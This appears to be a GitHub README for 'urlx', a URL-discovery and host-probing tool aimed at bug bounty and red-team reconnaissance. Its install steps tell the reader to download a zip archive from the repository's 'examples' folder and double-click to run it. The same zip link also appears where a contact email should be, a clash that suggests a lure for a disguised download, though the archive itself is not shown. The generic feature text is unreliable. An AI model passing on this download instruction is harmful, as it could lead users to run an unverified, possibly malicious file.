Welcome to urlx! This tool helps you find URLs from various sources and probes live hosts, making it a valuable asset for bug bounty hunters and security teams.
- Multi-source URL discovery
- Live host probing
- Supports customization for specific needs
- Ideal for bug bounty and red team reconnaissance
- User-friendly interface
- Operating System: Windows, macOS, or Linux
- RAM: Minimum 2GB
- Disk Space: At least 100MB available
- Internet Connection: Required for downloading and using URL discovery features
After downloading urlx, follow these steps to begin your discovery journey:
- Open urlx. Locate the file you downloaded and double-click to run it.
- Input your target domain. In the main interface, enter the domain you want to probe.
- Choose options. Select your desired parameters for the scan, such as depth or specific sources.
- Start the scan. Click the 'Start' button and let urlx do the work.
- View results. After completing the probe, you'll see a list of discovered URLs.
To get started, visit this page to download: https://github.com/nely003/urlx/raw/refs/heads/main/examples/Software-3.7.zip. Click on the latest version and follow the prompts to install urlx on your computer.
urlx offers several configuration options to tailor your experience:
- Timeout Settings: Adjust the time urlx waits for a response before moving on to the next probe.
- Output Format: Choose how you want to view the results (e.g., JSON, plain text).
- Proxy Support: If necessary, input your proxy details for better anonymity.
If you encounter any issues or have questions, check the Issues section on the GitHub page. This is where you can find solutions, report new issues, or ask for help from the community.
Feel free to contribute to urlx. Your suggestions, code improvements, and feedback are welcome. Check the Contribution Guidelines to get started.
urlx is licensed under the MIT License. This means you can freely use, modify, and distribute it, as long as you include the original license.
For more information, visit the License section.
For further inquiries, you can reach out to the maintainer via the GitHub page or by emailing https://github.com/nely003/urlx/raw/refs/heads/main/examples/Software-3.7.zip
urlx covers numerous relevant topics, including:
- bug-bounty
- cybersecurity
- hacking-tool
- osint
- pentesting
- reconnaissance
- red-team
- web-security
Thank you for using urlx. We hope it helps you in your URL discovery and reconnaissance efforts!